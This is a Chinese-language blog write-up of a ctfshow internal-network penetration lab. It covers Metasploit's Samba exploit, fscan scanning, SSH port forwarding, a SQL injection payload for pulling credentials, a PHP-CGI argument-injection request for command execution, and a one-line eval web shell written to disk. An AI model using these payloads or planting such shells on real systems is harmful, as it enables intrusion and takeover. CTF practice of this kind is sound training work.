huarui bio photo

ctfshow内网渗透复现


复现过程


先放一下ssh命令:

ssh ctfshow@pwn.challenge.ctf.show -p 28169       #用于ssh连接题目shell
scp -P 28169 local_file ctfshow@pwn.challenge.ctf.show:/tmp     #用于上传东西

1.根据提示寻找有用的工具


题目提示我们攻击机有工具,利用find命令可以找到。或者直接乱翻文件,msf就在/opt目录下.

find / -name metasploit-framework

直接使用msfconsole报错,使用chmod 777 metasploit-framework 给权限后可以直接使用了


2.扫描


因为是内网渗透,所以还是要做一些扫描。

上传fscan并扫描内网

scp -P 28169 local_file ctfshow@pwn.challenge.ctf.show:/remote/directory/
ifconfig           #查看ip
./fscan -h 172.2.162.4/24 -o fscan.log #扫描



3.公鸡


这里我在网上找到个很奇怪的解,已知445端口存在一个samba的洞,可以直接打下来

msfconsole
use exploit/linux/samba/is_known_pipename
set rhost x.x.x.x
exploit 

然鹅卡在获得Starting interaction with 1…的提示了。这边不打算尝试了,估计是非预期解被修复了

本着学习的目的,继续尝试网上其他大佬的解法


刚刚扫描的时候发现一个80端口和文件管理系统,我们想办法进入看看怎么个事。网上有两种办法,一个是用ssh搭 socks5隧道,第二种就是用ssh映射直接映射到本地端口。我这里选择第二种办法

ssh -L 8085:172.2.249.5:80 ctfshow@pwn.challenge.ctf.show -p 28195

然后可以直接访问本地的8085端口


这里考了个沟槽的代码审计,审的是sql注入。根据回显得到账号密码


username=admin&email='union/**/select/**/username/**/from/**/user#@qq.com

username=admin&email='union/**/select/**/password/**/from/**/user#@qq.com

得到账号密码ctfshow和ctfshase


md,复现到这里才知道,原来上面的samba才是真解,不过不管了,硬着头皮继续做复现 回到fscan记得这里发现了一个cve


可以使用这个方法直接命令执行

POST /index.php/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1

<?php echo system("ls"); ?>


写shell咯

<?php echo system("echo '<? @eval(\$_POST[a]);?>' > 1.php");?>


至此,三个内网主机已经全部拿下。




































写在后面

有些东西不好明说,但是那种感觉又回来了。我得马上调整回来